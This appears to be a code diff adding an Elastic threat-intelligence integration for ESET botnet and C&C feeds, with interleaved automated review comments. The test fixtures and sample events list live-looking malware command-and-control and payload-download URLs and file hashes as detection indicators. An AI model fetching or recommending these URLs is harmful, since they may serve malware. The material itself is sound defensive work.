"name": "373d34874d7bc89fd4cefa6272ee80bf", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-10-15T02:10:07.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--b48a316c-8068-4a0a-b657-eea457ae21ef", + "labels": [ + 
"malicious-activity" + ], + "valid_until": "2023-10-17T02:10:07.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--b48a316c-8068-4a0a-b657-eea457ae21ef\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:10:07.000Z\", \"modified\": \"2023-10-15T02:10:07.000Z\", \"name\": \"example.com\", \"description\": \"C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.\", \"pattern\": \"[url:value = 'http://5.42.65.80/8bmeVwqx/index.php']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:10:07Z\", \"valid_until\": \"2023-10-17T02:10:07Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Botnet stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "C&C indicates that a botnet Win32/TrojanDownloader.Amadey.A trojan is present.", + "last_seen": "2023-10-15T02:10:07.000Z", + "modified_at": "2023-10-15T02:10:07.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "original": "http://5.42.65.80/8bmeVwqx/index.php" + } + } + } + } + ] +} \ No newline at end of file diff --git a/packages/ti_eset/data_stream/botnet/_dev/test/system/test-httpjson-config.yml b/packages/ti_eset/data_stream/botnet/_dev/test/system/test-httpjson-config.yml new file mode 100644 index 00000000000..9797b7b31fb --- /dev/null +++ b/packages/ti_eset/data_stream/botnet/_dev/test/system/test-httpjson-config.yml @@ -0,0 +1,13 @@ +input: httpjson +service: eti +vars: + username: test + password: test +data_stream: + vars: + preserve_original_event: true + url: http://{{Hostname}}:{{Port}}/taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/0abb06690b0b47e49cd7794396b76b20/objects/ + interval: 30s + enable_request_tracer: true +assert: + hit_count: 2 
diff --git a/packages/ti_eset/data_stream/botnet/agent/stream/httpjson.yml.hbs b/packages/ti_eset/data_stream/botnet/agent/stream/httpjson.yml.hbs new file mode 100644 index 00000000000..41117cedade --- /dev/null +++ b/packages/ti_eset/data_stream/botnet/agent/stream/httpjson.yml.hbs 
@@ -0,0 +1,72 @@
+config_version: "2"
+
+interval: {{interval}}
+request.method: "GET"
+{{#if enable_request_tracer}}
+request.tracer.filename: "../../logs/httpjson/http-request-trace-*.ndjson"
+{{/if}}
+
+auth.basic.user: {{username}}
+auth.basic.password: {{password}}
+
+{{#if url}}
+request.url: {{url}}
+{{/if}}
+{{#if ssl}}
+request.ssl: {{ssl}}
+{{/if}}
+{{#if http_client_timeout}}
+request.timeout: {{http_client_timeout}}
+{{/if}}
+{{#if proxy_url}}
+request.proxy_url: {{proxy_url}}
+{{/if}}
+
+request.transforms:
+ - set:
+ target: header.Content-Type
+ value: application/taxii+json;version=2.1
+ - set:
+ target: header.Accept
+ value: application/taxii+json;version=2.1
+ - set:
+ target: url.params.match[type]
+ value: indicator
+ - set:
+ target: url.params.limit
+ value: {{page_size}}
+ - set:
+ target: url.params.added_after
+ value: '[[ .cursor.timestamp ]]'
+ default: '[[ formatDate (now (parseDuration "-{{initial_interval}}")) "2006-01-02T15:04:05.000Z" ]]'
+
+response.pagination:
+ - set:
+ target: url.params.added_after
+ value: >-
+ [[ if .last_response.body.more ]][[ .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ end ]]
+ fail_on_template_error: true
+
+response.split:
+ target: body.objects
+
+cursor:
+ timestamp:
+ value: >-
+ [[ if .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ else ]][[.last_response.url.params.Get "added_after"]][[ end ]]
+ ignore_empty_value: true
+
+tags:
+{{#if preserve_original_event}}
+ - preserve_original_event
+{{/if}}
+{{#each tags as |tag|}}
+ - {{tag}}
+{{/each}}
+{{#contains "forwarded" tags}}
+publisher_pipeline.disable_host: true
+{{/contains}}
+{{#if processors}}
+processors:
+{{processors}}
+{{/if}}
diff --git a/packages/ti_eset/data_stream/botnet/elasticsearch/ilm/default_policy.json b/packages/ti_eset/data_stream/botnet/elasticsearch/ilm/default_policy.json
new file mode 100644
index 00000000000..459c9fffc4e
--- /dev/null
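Review bot: `request.tracer.filename` is enabled in this hunk with no rotation limit, so once an operator flips `enable_request_tracer` the `http-request-trace-*.ndjson` files keep every request and response body of the feed and grow without bound on the agent host; adding `request.tracer.maxbackups: 5` inside the same `{{#if enable_request_tracer}}` block caps that. `auth.basic.user: {{username}}` and `auth.basic.password: {{password}}` are emitted as bare YAML scalars, so a secret containing `: `, ` #` or a leading `[`, `{` or `*` changes the parsed structure or fails to load, and nothing visible constrains the value; quoting or otherwise escaping it, or documenting the restriction on the package-level var, is worth considering. The manifest for this stream is not in this chunk, so I cannot confirm where `username`/`password` are declared.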
+++ b/packages/ti_eset/data_stream/botnet/elasticsearch/ilm/default_policy.json
@@ -0,0 +1,23 @@
+{
+ "policy": {
+ "phases": {
+ "delete": {
+ "actions": {
+ "delete": {}
+ },
+ "min_age": "7d"
+ },
+ "hot": {
+ "actions": {
+ "rollover": {
+ "max_age": "2d",
+ "max_size": "50gb"
+ },
+ "set_priority": {
+ "priority": 100
+ }
+ }
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/packages/ti_eset/data_stream/botnet/elasticsearch/ingest_pipeline/default.yml b/packages/ti_eset/data_stream/botnet/elasticsearch/ingest_pipeline/default.yml
new file mode 100644
index 00000000000..092c626f7b2
--- /dev/null
+++ b/packages/ti_eset/data_stream/botnet/elasticsearch/ingest_pipeline/default.yml
@@ -0,0 +1,156 @@
+---
+description: Pipeline for processing botnet collection feed
+processors:
+ - set:
+ field: ecs.version
+ value: '8.11.0'
+ - set:
+ field: event.kind
+ value: enrichment
+ - append:
+ field: event.category
+ value: threat
+ allow_duplicates: false
+ - append:
+ field: event.type
+ value: indicator
+ allow_duplicates: false
+ - set:
+ field: threat.indicator.provider
+ value: eset
+ - rename:
+ field: message
+ target_field: event.original
+ ignore_missing: true
+ if: ctx.event?.original == null
+ - json:
+ field: event.original
+ target_field: eti
+ - drop:
+ if: ctx.eti?.type != 'indicator'
+ - set:
+ field: threat.feed.name
+ value: "ESET Botnet stix 2.1"
+ - date:
+ field: eti.created
+ target_field: "@timestamp"
+ formats:
+ - "ISO8601"
+ if: "ctx.eti?.created != null"
+ - date:
+ field: eti.modified
+ target_field: threat.indicator.last_seen
+ formats:
+ - "ISO8601"
+ if: "ctx.eti?.modified != null"
+ - set:
+ field: threat.indicator.modified_at
+ copy_from: threat.indicator.last_seen
+ if: "ctx.threat?.indicator?.last_seen != null"
+ - date:
+ field: eti.valid_until
+ target_field: eset.valid_until
+ formats:
+ - "ISO8601"
+ if: "ctx.eti?.valid_until != null"
+ - rename:
+ field: eti.id
+ target_field: eset.id
+ ignore_missing: true
+ - rename:
+ field: eti.description
+ target_field: threat.indicator.description
+ ignore_missing: true
+ - foreach:
+ field: eti.labels
+ processor:
+ append:
+ field: eset.labels
+ value: "{{_ingest._value}}"
+ ignore_missing: true
+ ignore_failure: true
+ if: ctx.eti?.labels != null
+ - script:
+ lang: painless
+ params:
+ "malicious-activity": 'High'
+ "phishing-activity": 'High'
+ "unwanted-activity": 'Medium'
+ "benign": 'Low'
+ if: ctx.eset?.labels != null
+ source: >
+ for (def label : ctx.eset.labels) {
+ if (params.containsKey(label)) {
+ ctx.threat.indicator.confidence = params.get(label);
+ break;
+ }
+ }
+ - split:
+ field: eti.pattern
+ target_field: eti._patterns
+ separator: ' OR '
+ 
ignore_missing: true
+ - foreach:
+ field: eti._patterns
+ processor:
+ grok:
+ field: _ingest._value
+ patterns:
+ - "^\\[?file:hashes.'MD5'%{SPACE}=%{SPACE}'%{DATA:threat.indicator.file.hash.md5}'\\]?"
+ - "^\\[?file:hashes.'SHA-1'%{SPACE}=%{SPACE}'%{DATA:threat.indicator.file.hash.sha1}'\\]?"
+ - "^\\[?file:hashes.'SHA-256'%{SPACE}=%{SPACE}'%{DATA:threat.indicator.file.hash.sha256}'\\]?"
+ - "^\\[url:value%{SPACE}=%{SPACE}'%{DATA:threat.indicator.url.original}'\\]?"
+ ignore_failure: true
+
+ - set:
+ field: threat.indicator.type
+ value: url
+ if: "ctx.threat?.indicator?.url != null"
+ - set:
+ field: threat.indicator.type
+ value: file
+ if: ctx.threat?.indicator?.file != null
+ - set:
+ field: threat.indicator.name
+ copy_from: eti.name
+ if: "ctx.eti?.name != null"
+ - remove:
+ field:
+ - eti
+ ignore_missing: true
+ - remove:
+ field: event.original
+ if: "ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))"
+ ignore_failure: true
+ ignore_missing: true
+ - script:
+ tag: script_to_drop_null_values
+ lang: painless
+ description: Drops null/empty values recursively.
+ source: |-
+ boolean drop(Object o) {
+ if (o == null || o == '') {
+ return true;
+ } else if (o instanceof Map) {
+ ((Map) o).values().removeIf(v -> drop(v));
+ return (((Map) o).size() == 0);
+ } else if (o instanceof List) {
+ ((List) o).removeIf(v -> drop(v));
+ return (((List) o).length == 0);
+ }
+ return false;
+ }
+ drop(ctx);
+ - append:
+ field: event.kind
+ value: pipeline_error
+ allow_duplicates: false
+ if: ctx.error?.message != null
+on_failure:
+ - set:
+ field: error.message
+ value: '{{ _ingest.on_failure_message }}'
+ - set:
+ field: event.kind
+ tag: set_pipeline_error_to_event_kind
+ value: pipeline_error
diff --git a/packages/ti_eset/data_stream/botnet/fields/agent.yml b/packages/ti_eset/data_stream/botnet/fields/agent.yml
new file mode 100644
index 00000000000..845b84ed9c0
--- /dev/null
+++ b/packages/ti_eset/data_stream/botnet/fields/agent.yml
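Review bot: The url branch of the grok `foreach` only fills `threat.indicator.url.original`, and nothing afterwards derives `threat.indicator.url.domain`, `url.full` or `threat.indicator.ip` from it, so C&C entries like `http://77.91.68.52/fuza` in the test fixture carry no host or address field for indicator-match rules to key on (the stock rules, as far as I recall, look at `url.full`, `ip` and `domain` rather than `url.original`, which is worth confirming). A `uri_parts` processor placed right after the `threat.indicator.type: url` set, plus a `set` that copies the original into `url.full`, fills these without touching the file-hash branch; deriving `threat.indicator.ip` when the parsed domain is a literal address could follow. The expected-output fixture added in this commit would need regenerating for the new fields. Minor: the two `threat.indicator.type` sets quote their `if` expressions differently; pick one form for both.
```yaml
  - set:
      field: threat.indicator.type
      value: url
      if: ctx.threat?.indicator?.url != null
  - uri_parts:
      field: threat.indicator.url.original
      target_field: threat.indicator.url
      keep_original: true
      ignore_failure: true
      if: ctx.threat?.indicator?.url?.original != null
  - set:
      field: threat.indicator.url.full
      copy_from: threat.indicator.url.original
      if: ctx.threat?.indicator?.url?.original != null
  # … unchanged: threat.indicator.type file set, threat.indicator.name set, removes, drop-null script, on_failure …
```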
@@ -0,0 +1,201 @@ +- name: cloud + title: Cloud + group: 2 + description: Fields related to the cloud or infrastructure the events are coming from. + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' + type: group + fields: + - name: account.id + level: extended + type: keyword + ignore_above: 1024 + description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment. + + Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.' + example: 666777888999 + - name: availability_zone + level: extended + type: keyword + ignore_above: 1024 + description: Availability zone in which this host is running. + example: us-east-1c + - name: instance.id + level: extended + type: keyword + ignore_above: 1024 + description: Instance ID of the host machine. + example: i-1234567890abcdef0 + - name: instance.name + level: extended + type: keyword + ignore_above: 1024 + description: Instance name of the host machine. + - name: machine.type + level: extended + type: keyword + ignore_above: 1024 + description: Machine type of the host machine. + example: t2.medium + - name: provider + level: extended + type: keyword + ignore_above: 1024 + description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + example: aws + - name: region + level: extended + type: keyword + ignore_above: 1024 + description: Region in which this host is running. + example: us-east-1 + - name: project.id + type: keyword + description: Name of the project in Google Cloud. + - name: image.id + type: keyword + description: Image ID for the cloud instance. 
+- name: container + title: Container + group: 2 + description: 'Container fields are used for meta information about the specific container that is the source of information. + + These fields help correlate data based containers from any runtime.' + type: group + fields: + - name: id + level: core + type: keyword + ignore_above: 1024 + description: Unique container id. + - name: image.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the image the container was built on. + - name: labels + level: extended + type: object + object_type: keyword + description: Image labels. + - name: name + level: extended + type: keyword + ignore_above: 1024 + description: Container name. +- name: host + title: Host + group: 2 + description: 'A host is defined as a general computing instance. + + ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' + type: group + fields: + - name: architecture + level: core + type: keyword + ignore_above: 1024 + description: Operating system architecture. + example: x86_64 + - name: domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the domain of which the host is a member. + + For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.' + example: CONTOSO + default_field: false + - name: hostname + level: core + type: keyword + ignore_above: 1024 + description: 'Hostname of the host. + + It normally contains what the `hostname` command returns on the host machine.' + - name: id + level: core + type: keyword + ignore_above: 1024 + description: 'Unique host id. + + As hostname is not always unique, use values that are meaningful in your environment. + + Example: The current usage of `beat.name`.' 
+ - name: ip + level: core + type: ip + description: Host ip addresses. + - name: mac + level: core + type: keyword + ignore_above: 1024 + description: Host mac addresses. + - name: name + level: core + type: keyword + ignore_above: 1024 + description: 'Name of the host. + + It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.' + - name: os.family + level: extended + type: keyword + ignore_above: 1024 + description: OS family (such as redhat, debian, freebsd, windows). + example: debian + - name: os.kernel + level: extended + type: keyword + ignore_above: 1024 + description: Operating system kernel version as a raw string. + example: 4.4.0-112-generic + - name: os.name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + default_field: false + description: Operating system name, without the version. + example: Mac OS X + - name: os.platform + level: extended + type: keyword + ignore_above: 1024 + description: Operating system platform (such centos, ubuntu, windows). + example: darwin + - name: os.version + level: extended + type: keyword + ignore_above: 1024 + description: Operating system version as a raw string. + example: 10.14.1 + - name: type + level: core + type: keyword + ignore_above: 1024 + description: 'Type of host. + + For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.' + - name: containerized + type: boolean + description: > + If the host is a container. + + - name: os.build + type: keyword + example: "18D109" + description: > + OS build information. + + - name: os.codename + type: keyword + example: "stretch" + description: > + OS codename, if any. + +- name: input.type + type: keyword + description: Input type. 
diff --git a/packages/ti_eset/data_stream/botnet/fields/base-fields.yml b/packages/ti_eset/data_stream/botnet/fields/base-fields.yml new file mode 100644 index 00000000000..7c798f4534c --- /dev/null +++ b/packages/ti_eset/data_stream/botnet/fields/base-fields.yml @@ -0,0 +1,12 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: '@timestamp' + type: date + description: Event timestamp. diff --git a/packages/ti_eset/data_stream/botnet/fields/ecs.yml b/packages/ti_eset/data_stream/botnet/fields/ecs.yml new file mode 100644 index 00000000000..43534883f1c --- /dev/null +++ b/packages/ti_eset/data_stream/botnet/fields/ecs.yml @@ -0,0 +1,42 @@ +- external: ecs + name: ecs.version +- external: ecs + name: message +- external: ecs + name: error.message +- external: ecs + name: event.category +- external: ecs + name: event.ingested +- external: ecs + name: event.kind +- external: ecs + name: event.original +- external: ecs + name: event.created +- external: ecs + name: tags +- external: ecs + name: threat.indicator.name +- external: ecs + name: threat.indicator.confidence +- external: ecs + name: threat.indicator.provider +- external: ecs + name: threat.indicator.url.original +- external: ecs + name: threat.indicator.file.hash.md5 +- external: ecs + name: threat.indicator.file.hash.sha1 +- external: ecs + name: threat.indicator.file.hash.sha256 +- external: ecs + name: threat.indicator.type +- external: ecs + name: threat.indicator.description +- external: ecs + name: threat.indicator.modified_at +- external: ecs + name: threat.indicator.last_seen +- external: ecs + name: threat.feed.name 
diff --git a/packages/ti_eset/data_stream/botnet/fields/fields.yml b/packages/ti_eset/data_stream/botnet/fields/fields.yml new file mode 100644 index 00000000000..bf7e7383df2 --- /dev/null +++ b/packages/ti_eset/data_stream/botnet/fields/fields.yml @@ -0,0 +1,21 @@ +- name: eset + type: group + description: > + Fields for ESET Threat Intelligence + + fields: + - name: id + type: keyword + description: The UID of the event object. + - name: valid_until + type: date + description: >- + Event expiration date. + - name: labels + type: keyword + description: >- + Threat labels. +- name: labels.is_ioc_transform_source + type: constant_keyword + value: 'true' + description: Field indicating if its the transform source for supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators. diff --git a/packages/ti_eset/data_stream/botnet/lifecycle.yml b/packages/ti_eset/data_stream/botnet/lifecycle.yml new file mode 100644 index 00000000000..326b14e00f6 --- /dev/null +++ b/packages/ti_eset/data_stream/botnet/lifecycle.yml @@ -0,0 +1 @@ +data_retention: 7d diff --git a/packages/ti_eset/data_stream/botnet/manifest.yml b/packages/ti_eset/data_stream/botnet/manifest.yml new file mode 100644 index 00000000000..4a5f15e49df --- /dev/null +++ b/packages/ti_eset/data_stream/botnet/manifest.yml 
@@ -0,0 +1,95 @@ +type: logs +title: "Botnet" +ilm_policy: logs-ti_eset.botnet-default_policy +streams: + - input: httpjson + title: Botnet + description: Collect data from ETI Botnet feed + template_path: httpjson.yml.hbs + vars: + - name: url + description: URL with API root and identifier of Botnet collection as described by [TAXII v2.1 standard](https://docs.oasis-open.org/cti/taxii/v2.1/os/taxii-v2.1-os.html#_Toc31107514) + type: text + title: Collection URL + multi: false + required: true + show_user: true + default: https://taxii.eset.com/taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/0abb06690b0b47e49cd7794396b76b20/objects/ + - name: enable_request_tracer + type: bool + title: Enable request tracing + multi: false + required: false + show_user: false + description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-httpjson.html#_request_tracer_filename) for details. + - name: http_client_timeout + type: text + title: HTTP Client Timeout + description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h. + multi: false + required: false + show_user: false + default: 1m + - name: proxy_url + type: text + title: Proxy URL + multi: false + required: false + show_user: false + description: URL to proxy connections in the form of http\[s\]://:@: + - name: interval + type: text + title: Interval + description: Interval at which the logs will be pulled. Supported units for this parameter are h/m/s. 
+ multi: false + required: true + show_user: true + default: 1h + - name: initial_interval + type: text + title: Initial Interval + multi: false + required: true + show_user: false + default: 48h + description: How far back to look for indicators the first time the agent is started. Supported units for this parameter are h/m/s. + - name: page_size + type: integer + multi: false + required: false + default: "1000" + show_user: false + title: Page size + description: Maximum number of records to pull in one request. + - name: ssl + type: yaml + title: SSL + multi: false + required: false + show_user: false + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - forwarded + - eset-botnet + - name: preserve_original_event + required: true + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original` + type: bool + multi: false + default: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: > + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + diff --git a/packages/ti_eset/data_stream/botnet/sample_event.json b/packages/ti_eset/data_stream/botnet/sample_event.json new file mode 100644 index 00000000000..f886d4a570b --- /dev/null +++ b/packages/ti_eset/data_stream/botnet/sample_event.json 
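Review bot: The `proxy_url` description reads `http\[s\]://:@:`, which has lost its placeholders and no longer tells the operator where the credentials and host go; it should read `URL to proxy connections in the form of http[s]://<user>:<password>@<host>:<port>`. The `ssl` var has no description at all even though the httpjson template passes it straight through as `request.ssl`; a one-liner such as `SSL options for the TAXII connection (e.g. certificate_authorities, verification_mode); see the Beats SSL documentation` would help. Because the stream template attaches basic-auth credentials to every request (the cc template in this commit does so unconditionally, and I assume botnet matches), the `url` description should also say that the collection URL must use `https://` for those credentials not to travel in clear text — the default is https, but nothing enforces it. Minor: `page_size` is `type: integer` but its default is the string `"1000"`; `default: 1000` keeps the types consistent.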
@@ -0,0 +1,73 @@ +{ + "@timestamp": "2023-10-18T02:05:09.000Z", + "agent": { + "ephemeral_id": "29211d59-f061-4b27-a169-6db0193f8177", + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.1" + }, + "data_stream": { + "dataset": "ti_eset.botnet", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "snapshot": false, + "version": "8.12.1" + }, + "eset": { + "id": "indicator--80dc09fa-563f-4a9c-ad1d-655d8dffa37f", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-20T02:05:09.000Z" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "threat" + ], + "created": "2024-03-27T14:18:01.686Z", + "dataset": "ti_eset.botnet", + "ingested": "2024-03-27T14:18:13Z", + "kind": "enrichment", + "original": "{\"created\":\"2023-10-18T02:05:09.000Z\",\"description\":\"Each of these file hashes indicates that a variant of Win32/Rescoms.B backdoor is present.\",\"id\":\"indicator--80dc09fa-563f-4a9c-ad1d-655d8dffa37f\",\"labels\":[\"malicious-activity\"],\"modified\":\"2023-10-18T02:05:09.000Z\",\"name\":\"373d34874d7bc89fd4cefa6272ee80bf\",\"pattern\":\"[file:hashes.'SHA-256'='b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7'] OR [file:hashes.'SHA-1'='373d34874d7bc89fd4cefa6272ee80bf'] OR [file:hashes.'MD5'='373d34874d7bc89fd4cefa6272ee80bf']\",\"pattern_type\":\"stix\",\"pattern_version\":\"2.1\",\"spec_version\":\"indicator\",\"type\":\"indicator\",\"valid_from\":\"2023-10-18T02:05:09Z\",\"valid_until\":\"2023-10-20T02:05:09Z\"}", + "type": [ + "indicator" + ] + }, + "input": { + "type": "httpjson" + }, + "tags": [ + "preserve_original_event", + "forwarded", + "eset-botnet" + ], + "threat": { + "feed": { + "name": "ESET Botnet stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Each of these file hashes indicates that a variant of Win32/Rescoms.B 
backdoor is present.", + "file": { + "hash": { + "md5": "373d34874d7bc89fd4cefa6272ee80bf", + "sha1": "373d34874d7bc89fd4cefa6272ee80bf", + "sha256": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7" + } + }, + "last_seen": "2023-10-18T02:05:09.000Z", + "modified_at": "2023-10-18T02:05:09.000Z", + "name": "373d34874d7bc89fd4cefa6272ee80bf", + "provider": "eset", + "type": "file" + } + } +} \ No newline at end of file diff --git a/packages/ti_eset/data_stream/cc/_dev/test/pipeline/test-common-config.yml b/packages/ti_eset/data_stream/cc/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..4da22641654 --- /dev/null +++ b/packages/ti_eset/data_stream/cc/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,3 @@ +fields: + tags: + - preserve_original_event diff --git a/packages/ti_eset/data_stream/cc/_dev/test/pipeline/test-eset-ndjson.log b/packages/ti_eset/data_stream/cc/_dev/test/pipeline/test-eset-ndjson.log new file mode 100644 index 00000000000..8f7e078328f --- /dev/null +++ b/packages/ti_eset/data_stream/cc/_dev/test/pipeline/test-eset-ndjson.log 
@@ -0,0 +1,10 @@ +{"id": "indicator--d4b78820-bf32-4665-a8f8-d5bb1d417502", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:00:03.000Z", "modified": "2023-10-15T02:00:03.000Z", "name": "example.com", "description": "C&C of Win32/TrojanDownloader.Amadey.A trojan", "pattern": "[url:value='http://77.91.124.1/theme/Plugins/clip64.dll']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:00:03Z", "valid_until": "2023-10-17T02:00:03Z", "labels": ["malicious-activity"]} +{"id": "indicator--799e3cc2-4cd0-45bb-a33e-eab2d7537a25", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:00:03.000Z", "modified": "2023-10-15T02:00:03.000Z", "name": "example.com", "description": "C&C of Win32/TrojanDownloader.Amadey.A trojan", "pattern": "[url:value='http://77.91.124.1/theme/index.php']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:00:03Z", "valid_until": "2023-10-17T02:00:03Z", "labels": ["malicious-activity"]} +{"id": "indicator--d756f043-1f54-4b73-b858-098b7af79adb", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:00:03.000Z", "modified": "2023-10-15T02:00:03.000Z", "name": "example.com", "description": "C&C of Win32/TrojanDownloader.Amadey.A trojan", "pattern": "[url:value='http://77.91.68.52/fuza/nalo.exe']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:00:03Z", "valid_until": "2023-10-17T02:00:03Z", "labels": ["malicious-activity"]} +{"id": "indicator--17444639-a914-4ec6-9706-68414d448e73", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:00:03.000Z", "modified": "2023-10-15T02:00:03.000Z", "name": "example.com", "description": "C&C of Win32/TrojanDownloader.Amadey.A trojan", "pattern": "[url:value='http://77.91.68.52/fuza/foto3553.exe']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:00:03Z", "valid_until": "2023-10-17T02:00:03Z", "labels": 
["malicious-activity"]} +{"id": "indicator--e6a2a190-b5aa-4f95-9565-8a4cf6bb3a37", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:00:03.000Z", "modified": "2023-10-15T02:00:03.000Z", "name": "example.com", "description": "C&C of Win32/TrojanDownloader.Amadey.A trojan", "pattern": "[url:value='http://77.91.124.1/theme/Plugins']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:00:03Z", "valid_until": "2023-10-17T02:00:03Z", "labels": ["malicious-activity"]} +{"id": "indicator--18d2048f-24b6-4895-9a01-de0b2fb91300", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:00:03.000Z", "modified": "2023-10-15T02:00:03.000Z", "name": "example.com", "description": "C&C of Win32/TrojanDownloader.Amadey.A trojan", "pattern": "[url:value='http://77.91.68.52/fuza']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:00:03Z", "valid_until": "2023-10-17T02:00:03Z", "labels": ["malicious-activity"]} +{"id": "indicator--0be0952c-3056-4220-9c31-c9b7a32a5d2c", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:00:03.000Z", "modified": "2023-10-15T02:00:03.000Z", "name": "example.com", "description": "C&C of Win32/TrojanDownloader.Amadey.A trojan", "pattern": "[url:value='http://77.91.68.52/fuza/sus.exe']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:00:03Z", "valid_until": "2023-10-17T02:00:03Z", "labels": ["malicious-activity"]} +{"id": "indicator--a24fc10b-803e-4804-a5b3-82719a13cacc", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:10:09.000Z", "modified": "2023-10-15T02:10:09.000Z", "name": "example.com", "description": "C&C of Win32/TrojanDownloader.Amadey.A trojan", "pattern": "[url:value='https://beelowers.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:10:09Z", "valid_until": "2023-10-17T02:10:09Z", "labels": ["malicious-activity"]} +{"id": 
"indicator--595b7750-06b6-4c8d-bf0d-0708081ba7af", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:10:09.000Z", "modified": "2023-10-15T02:10:09.000Z", "name": "example.com", "description": "C&C of Win32/Smokeloader.H trojan", "pattern": "[url:value='https://transfer.sh/get/QaPzxFmFQh']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:10:09Z", "valid_until": "2023-10-17T02:10:09Z", "labels": ["malicious-activity"]} +{"id": "indicator--c2c4c382-6eb3-4577-947d-2769c29bb1fa", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:10:09.000Z", "modified": "2023-10-15T02:10:09.000Z", "name": "example.com", "description": "C&C of Win32/TrojanDownloader.Amadey.A trojan", "pattern": "[url:value='http://mikolyda.beget.tech/385119']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:10:09Z", "valid_until": "2023-10-17T02:10:09Z", "labels": ["malicious-activity"]} \ No newline at end of file diff --git a/packages/ti_eset/data_stream/cc/_dev/test/pipeline/test-eset-ndjson.log-expected.json b/packages/ti_eset/data_stream/cc/_dev/test/pipeline/test-eset-ndjson.log-expected.json new file mode 100644 index 00000000000..3edd8c08d96 --- /dev/null +++ b/packages/ti_eset/data_stream/cc/_dev/test/pipeline/test-eset-ndjson.log-expected.json 
